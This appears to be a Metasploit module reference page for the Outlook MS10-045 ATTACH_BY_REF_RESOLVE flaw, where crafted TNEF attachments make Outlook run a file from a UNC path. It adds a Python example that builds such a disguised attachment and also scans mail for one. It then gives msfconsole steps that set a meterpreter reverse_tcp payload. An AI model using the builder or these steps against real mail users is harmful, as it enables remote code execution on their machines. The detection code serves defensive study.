Outlook ATTACH_BY_REF_RESOLVE File Execution
It has been discovered that certain e-mail messages cause Outlook to create Windows shortcut-like attachments or messages within Outlook. Through specially crafted TNEF streams carrying particular MAPI attachment properties, an attacker can set a path name to a file that is to be executed. When a user double-clicks such an attachment or message, Outlook executes the file referenced by that path name. The file can be local, but it can also be stored remotely, for example on a file share reached over a UNC path. Exploitation is limited by the fact that it is not possible for the attacker to supply command-line options to the executed file.
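As an added worked example (not code from the Metasploit module, the Akita advisory or this page), the following Python builds a minimal TNEF stream whose single attachment carries PR_ATTACH_METHOD = ATTACH_BY_REF_RESOLVE and a UNC path, then scans a stream for attachments whose attach method is any of the by-reference values (ATTACH_BY_REFERENCE, ATTACH_BY_REF_RESOLVE and ATTACH_BY_REF_ONLY, the last being the variant the sibling ms10_045_outlook_ref_only module targets), reporting the displayed file name next to the path that would be resolved. This goes slightly beyond the page, which covers only the REF_RESOLVE method. The TNEF attribute layout and the MAPI constants follow the public TNEF and MAPI specifications; the UNC host, file names, attachment key and the choice of PR_ATTACH_LONG_PATHNAME as the path-bearing property are assumptions made for illustration, since the page says only that a path name is set.

```python
"""Build a minimal TNEF stream with a by-reference attachment, then scan for it.
Constructed example, not the Metasploit module's or the advisory's code: structure
constants follow the TNEF/MAPI specs; the path, names, key and the use of
PR_ATTACH_LONG_PATHNAME as the path-bearing property are illustrative assumptions."""
import struct

TNEF_SIGNATURE = 0x223E9F78
LVL_MESSAGE, LVL_ATTACHMENT = 1, 2
ATT_TNEF_VERSION = 0x00089006       # atpDword: TNEF version
ATT_MESSAGE_CLASS = 0x00078008      # atpWord: message class string
ATT_ATTACH_REND_DATA = 0x00069002   # atpByte: marks the start of an attachment
ATT_ATTACHMENT = 0x00069005         # atpByte: MAPI property block of the attachment
PT_LONG, PT_STRING8 = 0x0003, 0x001E
PR_ATTACH_METHOD, PR_ATTACH_FILENAME = 0x3705, 0x3704
PR_ATTACH_PATHNAME, PR_ATTACH_LONG_PATHNAME = 0x3708, 0x370D
ATTACH_METHODS = {0: "NO_ATTACHMENT", 1: "ATTACH_BY_VALUE", 2: "ATTACH_BY_REFERENCE",
                  3: "ATTACH_BY_REF_RESOLVE", 4: "ATTACH_BY_REF_ONLY",
                  5: "ATTACH_EMBEDDED_MSG", 6: "ATTACH_OLE"}
BY_REFERENCE = {2, 3, 4}  # attachment body is a path to resolve, not file content


def _attr(level, attr_id, data):
    """One TNEF attribute: level, id, length, data, 16-bit additive checksum."""
    return (struct.pack("<BII", level, attr_id, len(data)) + data
            + struct.pack("<H", sum(data) & 0xFFFF))


def _mapi_props(props):
    """Encode (prop_id, prop_type, value) triples as a TNEF MAPI property block."""
    out = struct.pack("<I", len(props))
    for pid, ptype, value in props:
        out += struct.pack("<I", (pid << 16) | ptype)
        if ptype == PT_LONG:
            out += struct.pack("<I", value)
        elif ptype == PT_STRING8:
            s = value.encode("latin-1") + b"\0"          # length includes terminator
            out += struct.pack("<II", 1, len(s)) + s + b"\0" * (-len(s) % 4)
        else:
            raise ValueError("unsupported property type")
    return out


def build_tnef(path, shown_name, method=3, message_class="IPM.Document.txtfile"):
    """Constructed TNEF stream: one attachment whose 'content' is a path name."""
    out = struct.pack("<IH", TNEF_SIGNATURE, 0x1234)  # signature + attachment key
    out += _attr(LVL_MESSAGE, ATT_TNEF_VERSION, struct.pack("<I", 0x00010000))
    out += _attr(LVL_MESSAGE, ATT_MESSAGE_CLASS, message_class.encode("latin-1") + b"\0")
    out += _attr(LVL_ATTACHMENT, ATT_ATTACH_REND_DATA, b"\0" * 14)  # zeroed RENDDATA
    out += _attr(LVL_ATTACHMENT, ATT_ATTACHMENT, _mapi_props([
        (PR_ATTACH_METHOD, PT_LONG, method),
        (PR_ATTACH_FILENAME, PT_STRING8, shown_name),  # the name the user sees
        (PR_ATTACH_LONG_PATHNAME, PT_STRING8, path),   # the file Outlook resolves
    ]))
    return out


def _parse_mapi_props(data):
    """Decode PT_LONG and PT_STRING8 properties; stop at anything we cannot size."""
    count, = struct.unpack_from("<I", data, 0)
    off, props = 4, {}
    for _ in range(count):
        tag, = struct.unpack_from("<I", data, off); off += 4
        pid, ptype = tag >> 16, tag & 0xFFFF
        if pid >= 0x8000:          # named property (GUID + name follow): not handled
            break
        if ptype == PT_LONG:
            props[pid], = struct.unpack_from("<I", data, off); off += 4
        elif ptype == PT_STRING8:
            n, = struct.unpack_from("<I", data, off); off += 4
            vals = []
            for _ in range(n):
                ln, = struct.unpack_from("<I", data, off); off += 4
                vals.append(data[off:off + ln].rstrip(b"\0").decode("latin-1"))
                off += ln + (-ln % 4)             # values are padded to 4 bytes
            props[pid] = vals[0] if n == 1 else vals
        else:
            break
    return props


def scan_tnef(stream):
    """Walk a TNEF stream and report attachments whose method is by-reference."""
    sig, _key = struct.unpack_from("<IH", stream, 0)
    if sig != TNEF_SIGNATURE:
        raise ValueError("not a TNEF stream")
    off, findings = 6, []
    while off < len(stream):
        level, attr_id, length = struct.unpack_from("<BII", stream, off); off += 9
        data = stream[off:off + length]; off += length
        checksum, = struct.unpack_from("<H", stream, off); off += 2
        if checksum != sum(data) & 0xFFFF:
            raise ValueError("bad attribute checksum before offset %d" % off)
        if level == LVL_ATTACHMENT and attr_id == ATT_ATTACHMENT:
            props = _parse_mapi_props(data)
            method = props.get(PR_ATTACH_METHOD, 1)     # absent method means by value
            if method in BY_REFERENCE:
                findings.append({"method": ATTACH_METHODS.get(method, hex(method)),
                                 "shown_as": props.get(PR_ATTACH_FILENAME),
                                 "path": props.get(PR_ATTACH_LONG_PATHNAME)
                                 or props.get(PR_ATTACH_PATHNAME)})
    return findings
```

scan_tnef is the check a mail gateway would run over each winmail.dat it sees: a by-value attachment (method 1) produces no finding, the displayed name is reported next to the path so a benign-looking extension such as .jpg beside a UNC path to an .exe stands out, and a corrupted attribute checksum raises instead of being silently skipped.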
Exploit Rank
- Excellent
Exploit Authors
- Yorick Koster < yorick [at] akitasecurity.nl >
Vulnerability References
- MSB-MS10-045
- CVE-2010-0266
- OSVDB-66296
- BID-41446
- http://www.akitasecurity.nl/advisory.php?id=AK20091001
Exploit Targets
- 0 - Automatic (default)
Exploit Development
Similar Exploit Modules
- exploit/windows/email/ms07_017_ani_loadimage_chunksize
- exploit/windows/email/ms10_045_outlook_ref_only
Exploit Usage Information
$ msfconsole
msf > use exploit/windows/email/ms10_045_outlook_ref_resolve
msf exploit(ms10_045_outlook_ref_resolve) > show payloads
msf exploit(ms10_045_outlook_ref_resolve) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms10_045_outlook_ref_resolve) > set LHOST [MY IP ADDRESS]
msf exploit(ms10_045_outlook_ref_resolve) > set MAILTO [STRING]
msf exploit(ms10_045_outlook_ref_resolve) > set RHOST [TARGET IP]
msf exploit(ms10_045_outlook_ref_resolve) > set SUBJECT [STRING]
msf exploit(ms10_045_outlook_ref_resolve) > exploit
Exploit Module Options
| Option | Description |
| --- | --- |
| EXTENSION | The extension used in the fake file name (default: jpg) |
| MAILFROM | The FROM address of the e-mail (default: random@example.com) |
| MAILTO | The TO address of the email |
| MESSAGECLASS | Message Class value (default: IPM.Document.txtfile) |
| PASSWORD | SMTP Password for sending email |
| RHOST | The SMTP server to send through |
| RPORT | The SMTP server port (e.g. 25, 465, 587, 2525) (default: 25) |
| SRVHOST | The local host to listen on. This must be an address on the local machine or 0.0.0.0 (default: 0.0.0.0) |
| SRVPORT | The daemon port to listen on (do not change) (default: 80) |
| SSLCert | Path to a custom SSL certificate (default is randomly generated) |
| SUBJECT | Subject line of the email |
| UNCHOST | The host portion of the UNC path to provide to clients (ex: 1.2.3.4). |
| URIPATH | The URI to use (do not change). (default: /) |
| USERNAME | SMTP Username for sending email |
| VERBOSE | Display verbose information (default: true) |
| CHOST | The local client address |
| CPORT | The local client port |
| ConnectTimeout | Maximum number of seconds to establish a TCP connection |
| ContextInformationFile | The information file that contains context information |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| EXE::Custom | Use custom exe instead of automatically generating a payload exe |
| EXE::FallBack | Use the default template in case the specified one is missing |
| EXE::Inject | Set to preserve the original EXE function |
| EXE::OldMethod | Set to use the substitution EXE generation method. |
| EXE::Path | The directory in which to look for the executable template |
| EXE::Template | The executable template file name. |
| EnableContextEncoding | Use transient context when encoding payloads |
| ListenerComm | The specific communication channel to use for this service |
| Proxies | Use a proxy chain |
| WORKSPACE | Specify the workspace for this module |
| HTML::base64 | Enable HTML obfuscation via an embedded base64 html object (IE not supported) (accepted: none, plain, single_pad, double_pad, random_space_injection) |
| HTML::javascript::escape | Enable HTML obfuscation via HTML escaping (number of iterations) |
| HTML::unicode | Enable HTTP obfuscation via unicode (accepted: none, utf-16le, utf-16be, utf-16be-marker, utf-32le, utf-32be) |
| HTTP::chunked | Enable chunking of HTTP responses via "Transfer-Encoding: chunked" |
| HTTP::compression | Enable compression of HTTP responses via content encoding (accepted: none, gzip, deflate) |
| HTTP::header_folding | Enable folding of HTTP headers |
| HTTP::junk_headers | Enable insertion of random junk HTTP headers |
| HTTP::server_name | Configures the Server header of all outgoing replies |
| TCP::max_send_size | Maximum TCP segment size. (0 = disable) |
| TCP::send_delay | Delays inserted before every send. (0 = disable) |
